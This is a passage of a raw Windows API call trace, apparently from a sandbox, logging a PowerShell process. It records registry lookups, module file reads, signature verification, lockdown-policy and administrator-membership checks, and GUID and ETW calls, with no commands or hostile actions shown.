lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8b9b8 | out: phkResult=0x653ef8b9b8*=0x808) returned 0x0 [0231.893] RegQueryValueExW (in: hKey=0x808, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8ba08, lpData=0x0, lpcbData=0x653ef8ba00*=0x0 | out: lpType=0x653ef8ba08*=0x1, lpData=0x0, lpcbData=0x653ef8ba00*=0x56) returned 0x0 [0231.893] RegQueryValueExW (in: hKey=0x808, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8ba08, lpData=0x25b5bdd99b8, lpcbData=0x653ef8ba00*=0x56 | out: lpType=0x653ef8ba08*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x653ef8ba00*=0x56) returned 0x0 [0231.893] RegCloseKey (hKey=0x808) returned 0x0 [0231.893] CoTaskMemAlloc (cb=0x10) returned 0x25b73b93e20 [0231.893] CoTaskMemAlloc (cb=0x50) returned 0x25b73cd1890 [0231.893] WinVerifyTrust () returned 0x0 [0231.894] CoTaskMemFree (pv=0x25b73cd1890) [0231.894] CoTaskMemFree (pv=0x25b73b93e20) [0231.894] CertFreeCertificateContext (pCertContext=0x25b73bb9910) returned 1 [0231.894] CloseHandle (hObject=0x6f4) returned 1 [0231.894] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x653ef8b5d0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0231.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8bab0) returned 1 [0231.895] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6f4 [0231.895] GetFileType (hFile=0x6f4) returned 0x1 [0231.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ba20) returned 1 [0231.895] GetFileType (hFile=0x6f4) returned 0x1 [0231.895] SetFilePointer (in: hFile=0x6f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x653ef8ba68*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x653ef8ba68*=0) returned 0x0 [0231.895] ReadFile (in: hFile=0x6f4, lpBuffer=0x25b5bddabf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8bae8, lpOverlapped=0x0 | out: lpBuffer=0x25b5bddabf8*, lpNumberOfBytesRead=0x653ef8bae8*=0x1000, lpOverlapped=0x0) returned 1 [0231.895] SetFilePointer (in: hFile=0x6f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x653ef8ba68*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x653ef8ba68*=0) returned 0x1000 [0231.895] ReadFile (in: hFile=0x6f4, lpBuffer=0x25b5bddabf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8bae8, lpOverlapped=0x0 | out: lpBuffer=0x25b5bddabf8*, lpNumberOfBytesRead=0x653ef8bae8*=0x1000, lpOverlapped=0x0) returned 1 [0231.896] SetFilePointer (in: hFile=0x6f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x653ef8ba68*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x653ef8ba68*=0) returned 0x2000 [0231.896] ReadFile (in: hFile=0x6f4, lpBuffer=0x25b5bddabf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8bae8, lpOverlapped=0x0 | out: lpBuffer=0x25b5bddabf8*, lpNumberOfBytesRead=0x653ef8bae8*=0x1000, lpOverlapped=0x0) returned 1 [0231.896] SetFilePointer (in: hFile=0x6f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x653ef8ba68*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x653ef8ba68*=0) returned 0x3000 [0231.896] ReadFile (in: hFile=0x6f4, lpBuffer=0x25b5bddabf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8bae8, lpOverlapped=0x0 | out: lpBuffer=0x25b5bddabf8*, lpNumberOfBytesRead=0x653ef8bae8*=0x1000, lpOverlapped=0x0) returned 1 [0231.896] SetFilePointer (in: hFile=0x6f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x653ef8ba68*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x653ef8ba68*=0) returned 0x4000 [0231.897] ReadFile (in: hFile=0x6f4, lpBuffer=0x25b5bddabf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8bae8, lpOverlapped=0x0 | out: lpBuffer=0x25b5bddabf8*, lpNumberOfBytesRead=0x653ef8bae8*=0x1000, lpOverlapped=0x0) returned 1 [0231.897] SetFilePointer (in: hFile=0x6f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x653ef8ba68*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x653ef8ba68*=0) returned 0x5000 [0231.897] ReadFile (in: hFile=0x6f4, lpBuffer=0x25b5bddabf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8bae8, lpOverlapped=0x0 | out: lpBuffer=0x25b5bddabf8*, lpNumberOfBytesRead=0x653ef8bae8*=0x298, lpOverlapped=0x0) returned 1 [0231.897] SetFilePointer (in: hFile=0x6f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x653ef8ba68*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x653ef8ba68*=0) returned 0x5298 [0231.897] ReadFile (in: hFile=0x6f4, lpBuffer=0x25b5bddabf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8bae8, lpOverlapped=0x0 | out: lpBuffer=0x25b5bddabf8*, lpNumberOfBytesRead=0x653ef8bae8*=0x0, lpOverlapped=0x0) returned 1 [0231.897] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cff8c0 [0231.897] GetSystemDirectoryW (in: lpBuffer=0x25b73cff8c0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0231.897] CoTaskMemFree (pv=0x25b73cff8c0) [0231.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x653ef8b5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0231.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ba00) returned 1 [0231.898] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x653ef8bae0 | out: lpFileInformation=0x653ef8bae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0231.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8b9c0) returned 1 [0231.898] WldpGetLockdownPolicy () returned 0x0 [0231.898] GetSystemInfo (in: lpSystemInfo=0x653ef8bb40 | out: lpSystemInfo=0x653ef8bb40*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0231.898] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8ba48 | out: phkResult=0x653ef8ba48*=0x820) returned 0x0 [0231.898] RegQueryValueExW (in: hKey=0x820, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x653ef8ba98, lpData=0x0, lpcbData=0x653ef8ba90*=0x0 | out: lpType=0x653ef8ba98*=0x0, lpData=0x0, lpcbData=0x653ef8ba90*=0x0) returned 0x2 [0231.898] RegCloseKey (hKey=0x820) returned 0x0 [0231.898] CloseHandle (hObject=0x6f4) returned 1 [0231.992] CoCreateGuid (in: pguid=0x653ef8bc58 | out: pguid=0x653ef8bc58*(Data1=0x4e8e1d51, Data2=0x265e, Data3=0x412f, Data4=([0]=0xbd, [1]=0xe1, [2]=0xe, [3]=0x47, [4]=0x74, [5]=0x5b, [6]=0xf5, [7]=0xf1))) returned 0x0 [0231.992] GetCurrentProcess () returned 0xffffffffffffffff [0231.993] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8bb78 | out: TokenHandle=0x653ef8bb78*=0x6f4) returned 1 [0231.993] GetTokenInformation (in: TokenHandle=0x6f4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8bc18 | out: TokenInformation=0x0, ReturnLength=0x653ef8bc18) returned 0 [0231.993] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x25b73927df0 [0231.993] GetTokenInformation (in: TokenHandle=0x6f4, TokenInformationClass=0x8, TokenInformation=0x25b73927df0, TokenInformationLength=0x4, ReturnLength=0x653ef8bc18 | out: TokenInformation=0x25b73927df0, ReturnLength=0x653ef8bc18) returned 1 [0231.993] LocalFree (hMem=0x25b73927df0) returned 0x0 [0231.993] DuplicateTokenEx (in: hExistingToken=0x6f4, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x653ef8bc78 | out: phNewToken=0x653ef8bc78*=0x820) returned 1 [0231.993] CheckTokenMembership (in: TokenHandle=0x820, SidToCheck=0x25b5bed6300*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x653ef8bc80 | out: IsMember=0x653ef8bc80) returned 1 [0231.993] CloseHandle (hObject=0x820) returned 1 [0232.018] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x653ef8b2b0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0232.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8b700) returned 1 [0232.018] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8b7e0 | out: lpFileInformation=0x653ef8b7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0232.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8b6c0) returned 1 [0232.018] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x653ef8b260, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0232.018] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x653ef8b190, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0232.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8b5e0) returned 1 [0232.019] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8b6c0 | out: lpFileInformation=0x653ef8b6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0232.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8b5a0) returned 1 [0232.019] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x653ef8b090, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0232.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8b570) returned 1 [0232.019] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x820 [0232.019] GetFileType (hFile=0x820) returned 0x1 [0232.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8b4e0) returned 1 [0232.019] GetFileType (hFile=0x820) returned 0x1 [0232.019] WTGetSignatureInfo () returned 0x0 [0232.044] CertDuplicateCertificateContext (pCertContext=0x25b73bb8c90) returned 0x25b73bb8c90 [0232.044] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8b608 | out: phkResult=0x653ef8b608*=0x818) returned 0x0 [0232.044] RegQueryValueExW (in: hKey=0x818, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8b658, lpData=0x0, lpcbData=0x653ef8b650*=0x0 | out: lpType=0x653ef8b658*=0x1, lpData=0x0, lpcbData=0x653ef8b650*=0x56) returned 0x0 [0232.044] RegQueryValueExW (in: hKey=0x818, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8b658, lpData=0x25b5befb268, lpcbData=0x653ef8b650*=0x56 | out: lpType=0x653ef8b658*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x653ef8b650*=0x56) returned 0x0 [0232.044] RegCloseKey (hKey=0x818) returned 0x0 [0232.044] CoTaskMemAlloc (cb=0x10) returned 0x25b73b938a0 [0232.044] CoTaskMemAlloc (cb=0x50) returned 0x25b73cd2250 [0232.044] WinVerifyTrust () returned 0x0 [0232.045] CoTaskMemFree (pv=0x25b73cd2250) [0232.045] CoTaskMemFree (pv=0x25b73b938a0) [0232.045] CertFreeCertificateContext (pCertContext=0x25b73bb8c90) returned 1 [0232.045] CloseHandle (hObject=0x820) returned 1 [0232.045] CoCreateGuid (in: pguid=0x653ef8b5d8 | out: pguid=0x653ef8b5d8*(Data1=0xf469148e, Data2=0x3ed3, Data3=0x4f09, Data4=([0]=0xa8, [1]=0x72, [2]=0x44, [3]=0x2c, [4]=0x2f, [5]=0xb3, [6]=0x28, [7]=0xca))) returned 0x0 [0232.455] CoCreateGuid (in: pguid=0x653ef8b5d8 | out: pguid=0x653ef8b5d8*(Data1=0xc4de09f, Data2=0x9dd5, Data3=0x4d6f, Data4=([0]=0x91, [1]=0x87, [2]=0xeb, [3]=0xeb, [4]=0x78, [5]=0x8f, [6]=0xf1, [7]=0xf))) returned 0x0 [0232.455] CoCreateGuid (in: pguid=0x653ef8b5d8 | out: pguid=0x653ef8b5d8*(Data1=0xe24e63f3, Data2=0x7d19, Data3=0x484b, Data4=([0]=0x8b, [1]=0x7f, [2]=0x86, [3]=0xd8, [4]=0x45, [5]=0x4, [6]=0x95, [7]=0x30))) returned 0x0 [0232.860] CoCreateGuid (in: pguid=0x653ef8b5d8 | out: pguid=0x653ef8b5d8*(Data1=0x7eb27f3e, Data2=0x4485, Data3=0x4432, Data4=([0]=0x83, [1]=0x7b, [2]=0xea, [3]=0xa4, [4]=0x16, [5]=0x68, [6]=0x53, [7]=0xcc))) returned 0x0 [0233.121] CoCreateGuid (in: pguid=0x653ef8b5d8 | out: pguid=0x653ef8b5d8*(Data1=0xaad02947, Data2=0x5786, Data3=0x4112, Data4=([0]=0x87, [1]=0xe3, [2]=0x34, [3]=0x53, [4]=0x95, [5]=0x76, [6]=0xc7, [7]=0xc5))) returned 0x0 [0233.430] CoCreateGuid (in: pguid=0x653ef8b5d8 | out: pguid=0x653ef8b5d8*(Data1=0x7258c2fe, Data2=0xdd04, Data3=0x47e3, Data4=([0]=0x8e, [1]=0x32, [2]=0xeb, [3]=0x76, [4]=0xf3, [5]=0x17, [6]=0x63, [7]=0x4f))) returned 0x0 [0233.430] CoCreateGuid (in: pguid=0x653ef8b5d8 | out: pguid=0x653ef8b5d8*(Data1=0x5c501e52, Data2=0x6542, Data3=0x46b4, Data4=([0]=0xbf, [1]=0xe1, [2]=0x91, [3]=0x93, [4]=0x7a, [5]=0x2b, [6]=0x30, [7]=0x2))) returned 0x0 [0233.431] CoCreateGuid (in: pguid=0x653ef8b5d8 | out: pguid=0x653ef8b5d8*(Data1=0xf4dfdcd, Data2=0x1645, Data3=0x41c7, Data4=([0]=0xa0, [1]=0x50, [2]=0xd4, [3]=0x6f, [4]=0xe0, [5]=0xdb, [6]=0x66, [7]=0xa8))) returned 0x0 [0233.513] CoCreateGuid (in: pguid=0x653ef8b5d8 | out: pguid=0x653ef8b5d8*(Data1=0xba3191a7, Data2=0x7fe3, Data3=0x40b0, Data4=([0]=0x9e, [1]=0x9, [2]=0x87, [3]=0x82, [4]=0x79, [5]=0x40, [6]=0x4c, [7]=0x50))) returned 0x0 [0233.694] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01680 [0233.694] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x25b73d01680, nSize=0x105 | out: lpBuffer="") returned 0x0 [0233.694] CoTaskMemFree (pv=0x25b73d01680) [0233.745] EtwEventActivityIdControl () returned 0x0 [0233.745] EtwEventActivityIdControl () returned 0x0 [0233.745] EtwEventActivityIdControl () returned 0x0 [0233.802] EtwEventActivityIdControl () returned 0x0 [0233.803] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01ce0 [0233.803] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x25b73d01ce0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0233.803] CoTaskMemFree (pv=0x25b73d01ce0) [0233.804] EtwEventActivityIdControl () returned 0x0 [0233.804] EtwEventActivityIdControl () returned 0x0 [0233.804] EtwEventActivityIdControl () returned 0x0 [0233.808] EtwEventActivityIdControl () returned 0x0 [0233.808] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cff480 [0233.808] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x25b73cff480, nSize=0x105 | out: lpBuffer="") returned 0x0 [0233.808] CoTaskMemFree (pv=0x25b73cff480) [0233.808] EtwEventActivityIdControl () returned 0x0 [0233.808] EtwEventActivityIdControl () returned 0x0 [0233.809] EtwEventActivityIdControl () returned 0x0 [0233.809] EtwEventActivityIdControl () returned 0x0 [0233.809] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfac40 [0233.809] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x25b73cfac40, nSize=0x105 | out: lpBuffer="") returned 0x0 [0233.809] CoTaskMemFree (pv=0x25b73cfac40) [0233.809] EtwEventActivityIdControl () returned 0x0 [0233.809] EtwEventActivityIdControl () returned 0x0 [0233.809] EtwEventActivityIdControl () returned 0x0 [0233.854] EtwEventActivityIdControl () returned 0x0 [0233.855] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfd8e0 [0233.855] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x25b73cfd8e0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0233.855] CoTaskMemFree (pv=0x25b73cfd8e0) [0233.855] EtwEventActivityIdControl () returned 0x0 [0233.855] EtwEventActivityIdControl () returned 0x0 [0233.855] EtwEventActivityIdControl () returned 0x0 [0233.855] EtwEventActivityIdControl () returned 0x0 [0233.855] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfb6e0 [0233.855] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x25b73cfb6e0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0233.856] CoTaskMemFree (pv=0x25b73cfb6e0) [0233.856] EtwEventActivityIdControl () returned 0x0 [0233.856] EtwEventActivityIdControl () returned 0x0 [0233.856] EtwEventActivityIdControl () returned 0x0 [0233.856] EtwEventActivityIdControl () returned 0x0 [0234.005] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8d958 | out: phkResult=0x653ef8d958*=0x6f4) returned 0x0 [0234.005] RegQueryValueExW (in: hKey=0x6f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8d9a8, lpData=0x0, lpcbData=0x653ef8d9a0*=0x0 | out: lpType=0x653ef8d9a8*=0x1, lpData=0x0, lpcbData=0x653ef8d9a0*=0x56) returned 0x0 [0234.005] RegQueryValueExW (in: hKey=0x6f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8d9a8, lpData=0x25b5c2981a0, lpcbData=0x653ef8d9a0*=0x56 | out: lpType=0x653ef8d9a8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x653ef8d9a0*=0x56) returned 0x0 [0234.005] RegCloseKey (hKey=0x6f4) returned 0x0 [0234.006] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8d958 | out: phkResult=0x653ef8d958*=0x6f4) returned 0x0 [0234.006] RegQueryValueExW (in: hKey=0x6f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8d9a8, lpData=0x0, lpcbData=0x653ef8d9a0*=0x0 | out: lpType=0x653ef8d9a8*=0x1, lpData=0x0, lpcbData=0x653ef8d9a0*=0x56) returned 0x0 [0234.006] RegQueryValueExW (in: hKey=0x6f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8d9a8, lpData=0x25b5c298548, lpcbData=0x653ef8d9a0*=0x56 | out: lpType=0x653ef8d9a8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x653ef8d9a0*=0x56) returned 0x0 [0234.006] RegCloseKey (hKey=0x6f4) returned 0x0 [0234.006] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8d958 | out: phkResult=0x653ef8d958*=0x6f4) returned 0x0 [0234.006] RegQueryValueExW (in: hKey=0x6f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8d9a8, lpData=0x0, lpcbData=0x653ef8d9a0*=0x0 | out: lpType=0x653ef8d9a8*=0x1, lpData=0x0, lpcbData=0x653ef8d9a0*=0x56) returned 0x0 [0234.006] RegQueryValueExW (in: hKey=0x6f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8d9a8, lpData=0x25b5c2988c8, lpcbData=0x653ef8d9a0*=0x56 | out: lpType=0x653ef8d9a8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x653ef8d9a0*=0x56) returned 0x0 [0234.007] RegCloseKey (hKey=0x6f4) returned 0x0 [0234.007] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8d958 | out: phkResult=0x653ef8d958*=0x6f4) returned 0x0 [0234.007] RegQueryValueExW (in: hKey=0x6f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8d9a8, lpData=0x0, lpcbData=0x653ef8d9a0*=0x0 | out: lpType=0x653ef8d9a8*=0x1, lpData=0x0, lpcbData=0x653ef8d9a0*=0x56) returned 0x0 [0234.007] RegQueryValueExW (in: hKey=0x6f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8d9a8, lpData=0x25b5c298c60, lpcbData=0x653ef8d9a0*=0x56 | out: lpType=0x653ef8d9a8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x653ef8d9a0*=0x56) returned 0x0 [0234.007] RegCloseKey (hKey=0x6f4) returned 0x0 [0234.007] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8d958 | out: phkResult=0x653ef8d958*=0x6f4) returned 0x0 [0234.007] RegQueryValueExW (in: hKey=0x6f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8d9a8, lpData=0x0, lpcbData=0x653ef8d9a0*=0x0 | out: lpType=0x653ef8d9a8*=0x1, lpData=0x0, lpcbData=0x653ef8d9a0*=0x56) returned 0x0 [0234.008] RegQueryValueExW (in: hKey=0x6f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8d9a8, lpData=0x25b5c299008, lpcbData=0x653ef8d9a0*=0x56 | out: lpType=0x653ef8d9a8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x653ef8d9a0*=0x56) returned 0x0 [0234.008] RegCloseKey (hKey=0x6f4) returned 0x0 [0234.008] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8d958 | out: phkResult=0x653ef8d958*=0x6f4) returned 0x0 [0234.008] RegQueryValueExW (in: hKey=0x6f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8d9a8, lpData=0x0, lpcbData=0x653ef8d9a0*=0x0 | out: lpType=0x653ef8d9a8*=0x1, lpData=0x0, lpcbData=0x653ef8d9a0*=0x56) returned 0x0 [0234.008] RegQueryValueExW (in: hKey=0x6f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8d9a8, lpData=0x25b5c2993b0, lpcbData=0x653ef8d9a0*=0x56 | out: lpType=0x653ef8d9a8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x653ef8d9a0*=0x56) returned 0x0 [0234.008] RegCloseKey (hKey=0x6f4) returned 0x0 [0234.008] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8d958 | out: phkResult=0x653ef8d958*=0x6f4) returned 0x0 [0234.009] RegQueryValueExW (in: hKey=0x6f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8d9a8, lpData=0x0, lpcbData=0x653ef8d9a0*=0x0 | out: 